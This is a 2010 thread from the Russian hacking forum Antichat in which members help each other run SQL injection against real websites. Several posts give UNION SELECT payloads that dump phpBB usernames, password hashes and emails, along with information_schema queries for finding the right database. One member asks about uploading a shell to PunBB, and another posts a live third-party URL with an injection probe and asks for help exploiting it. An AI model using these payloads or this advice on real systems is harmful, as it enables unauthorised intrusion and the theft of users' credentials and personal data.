ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12471  
Старый 09.04.2010, 21:42
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

union+select+concat_ws(0x3a,username,user_password ,user_email,user_icq),2+from+ph pbb_users--
 
Ответить с цитированием

  #12472  
Старый 09.04.2010, 21:46
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от SeNaP  
union+select+concat_ws(0x3a,username,user_password ,user_email,user_icq),2+from+ph pbb_users--
Дело Не в Этом,просто не дает вывести инфу с таблицы ..а запрос правильный
 
Ответить с цитированием

  #12473  
Старый 09.04.2010, 22:08
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию

Konqi телепатов нет - какую ошибку выдает? Мейби с кодировкой что то не то и нужно например unhex(hex(, e.g.: union+select+unhex(hex(concat_ws(0x3a,username,use r_password ,user_email,user_icq))),2+from+ph pbb_users--
 
Ответить с цитированием

  #12474  
Старый 09.04.2010, 22:12
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

+union+select+1,2+from+information_schema.tables NORM

+union+select+1,2+from+phpbb_users ERROR

но знаю что таблица существует

table_rows возвращает 4186 ,значит таблица не пуста
 
Ответить с цитированием

  #12475  
Старый 09.04.2010, 22:21
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию

Возможно что:
1)Проблемы с кодировкой, как можно решить описал.
2)Не достаточно грантов на phpbb_users.
3)phpbb_users нет.
4)Какая то хитрая гверя или скрипт выполняющий запрос что то меняет(мало вероятно).
5)ХЗ.
 
Ответить с цитированием

  #12476  
Старый 09.04.2010, 22:29
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Konqi
Когда Вы научитесь читать что-то?

Даю 99% что таблица в другой базе, этот вопрос сдесь задавали раз 500
Цитата:
Сообщение от PaCo  
2)Не достаточно грантов на phpbb_users.
.
В мускуле нельзя разграничить права на таблицы, только базы
 
Ответить с цитированием

  #12477  
Старый 09.04.2010, 22:35
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию

есть способы заливки шелла в PunBB 1.2.15 с правами админа ?
пробывал сплоент http://www.security.nnov.ru/files/punBB_spl.pl, не работает
 
Ответить с цитированием

  #12478  
Старый 10.04.2010, 00:01
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Цитата:
Сообщение от Konqi  
ребят помогите са скулом есть таблица phpbb_users

table_rows возвращает 4186

а когда делаю запрос union+select+1,2+from+phpbb_users--
выдает ошибку help!!

from+phpbb_users where table_schema='база с таблицой phpbb_users'
 
Ответить с цитированием

  #12479  
Старый 10.04.2010, 00:25
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Cначало
Цитата:
select table_schema from information_schema.tables where table_name='phpbb_users'
Выдаёт базу.Потом:
Цитата:
select username,user_password from база.phpbb_users
 
Ответить с цитированием

  #12480  
Старый 10.04.2010, 00:28
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183

Репутация: 13
Отправить сообщение для Darren с помощью ICQ
По умолчанию

http://www.nzp.co.nz/company.php?pg=79/**/order/**/by/**/4/*

помогите раскрутить скуль
Как я понял выводится только через ошибку
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ